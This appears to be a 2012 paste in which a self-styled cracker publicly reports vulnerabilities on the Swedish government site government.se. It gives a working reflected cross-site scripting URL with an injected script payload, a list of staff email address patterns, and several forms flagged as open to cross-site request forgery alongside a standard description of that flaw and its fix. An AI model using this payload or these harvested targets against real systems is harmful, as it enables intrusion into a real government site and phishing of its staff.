human_mind_cracker

report3: Sweden government

Oct 28th, 2012
**********************************************************************************************

Target: http://www.government.se

[**] XSS:

http://www.government.se/pub/road/Classic/share/jsp/popup_tipOff.jsp?nocache=true&%3Cscript%3Ealert%28%22XSS%20vuln%20on%20Sweden%20Governement%20website%20found%20by%20Human%20Mind%20Cracker%22%29%3C/script%3E&l=en&d=%22%27%3CkapeV%3E

********************** Works on Mozilla ;)

[**] Email:

email: n.n@gov.se

email: firstname.lastname@gov.se

email: ministryname.registrator@gov.se

email: forvaltningsavdelningen.registrator@gov.se

email: pressrummet@foreign.ministry.se

email: n.n@regeringskansliet.se

email: fornamn.efternamn@regeringskansliet.se

email: departementsnamnet.registrator@regeringskansliet.se

[**] Cross-site Request Forgery

Cross-site Request Forgery (CSRF) is a type of attack whereby unauthorized commands are transmitted from a user that the application trusts. Unlike Cross-site Scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user's browser.

[-] solution: URLs and forms that perform important operations must be protected by random tokens (hidden nonce values). These tokens must be checked for validity at the server before the request is processed.

url: http://www.government.se/sb/d/573/a/12566

form: <form method="GET" action="http://www.government.se/sb/d/573/a/12566" enctype="application/x-www-form-urlencoded" autocomplete="on"> ... </form>

url: http://www.government.se/sb/d/8317/a/201245

form: <form method="POST" action="http://www.government.se/sb/d/8317/a/201245" enctype="application/x-www-form-urlencoded" autocomplete="on"> ... </form>

url: http://www.government.se/sb/d/16286/a/202392

form: <form method="POST" action="http://www.government.se/sb/d/16286/a/202392" enctype="application/x-www-form-urlencoded" autocomplete="on"> ... </form>

url: http://www.government.se/sb/d/15633/a/166579

form: <form method="POST" action="http://www.government.se/sb/d/15633/a/166579" enctype="application/x-www-form-urlencoded" autocomplete="on"> ... </form>

url: http://www.government.se/pub/road/Classic/share/jsp/popup_tipOff.jsp?d=10123&nocache=true&a=117559&l=en

form: <form method="POST" action="http://www.government.se/pub/road/Classic/share/jsp/popup_tipOff.jsp" enctype="application/x-www-form-urlencoded" autocomplete="on"> ... </form>

url: http://www.government.se/sb/d/574/action/browse/c/y2012

form: <form method="POST" action="http://www.government.se/sb/d/574" enctype="application/x-www-form-urlencoded" autocomplete="on"> ... </form>


Picture : http://www.imagup.com/data/1166123868.html

human mind cracker